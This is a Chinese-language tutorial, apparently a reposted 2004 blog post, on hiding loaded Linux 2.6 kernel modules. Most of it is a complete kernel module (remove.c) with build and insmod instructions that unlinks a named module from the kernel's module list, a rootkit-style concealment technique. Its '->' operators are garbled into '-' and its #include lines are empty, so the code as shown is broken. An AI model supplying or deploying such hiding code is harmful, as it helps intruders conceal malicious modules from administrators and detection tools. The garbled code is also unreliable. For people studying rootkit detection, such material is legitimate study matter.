教你怎样隐藏Linux2.6的内核模块

2.6内核与2.4内核相比，有了许多变化，模块部分的实现完全重写，结构也有了一些变化。2.4内核中模块隐藏的方式为：(参考madsys的phrack 61-03)

struct module *p;

for (p=&__this_module; p-next; p=p-next)

{

if (strcmp(p-next-name, str))

continue;

p-next=p-next-next; //

break;

}

2.4的module定义为：

struct module

{

unsigned long size_of_struct; /* == sizeof(module) */

struct module *next;

const char *name;

unsigned long size;

...

}

2.6为：

struct module

{

enum module_state state;

/* Member of list of modules */

struct list_head list;

/* Unique handle for this module */

char name[MODULE_NAME_LEN];

...

}

因此使用标准的内核list系列处理函数(不需要再闭门造车了)，2.6版的进程隐藏重写为：

/*

* FileName: remove.c

* Author: CoolQ

* Date: 23:05 2004-9-2

* Makefile:

* ---------------- cut here -----------------

* obj-m += remove.o

* KDIR:= /lib/modules/$(shell uname -r)/build

* PWD:= $(shell pwd)

* default:

* $(MAKE) -C $(KDIR) SUBDIRS=$(PWD) modules

*----------------- cut here -----------------

* Compile:

* [root@coolq tmp]make

* Usage:

* [root@coolq tmp]insmod remove.ko mod_name=module_name_to_hide

*/

#include

#include

#include

#include

#include

#include

static char *mod_name = "module";

module_param(mod_name, charp, 0);

static int remove_init(void)

{

struct module *mod_head, *mod_counter;

struct list_head *p;

mod_head = &__this_module;

list_for_each(p, &mod_head-list){

mod_counter = list_entry(p, struct module, list);

if(strcmp(mod_counter-name, mod_name) == 0){

list_del(p);

printk("remove module %s successfully.\n", mod_name);

return 0;

}

}

printk("Can't find module %s.\n", mod_name);

return 0;

}

static void remove_exit(void)

{

}

module_init(remove_init);

module_exit(remove_exit);

MODULE_LICENSE("Dual BSD/GPL");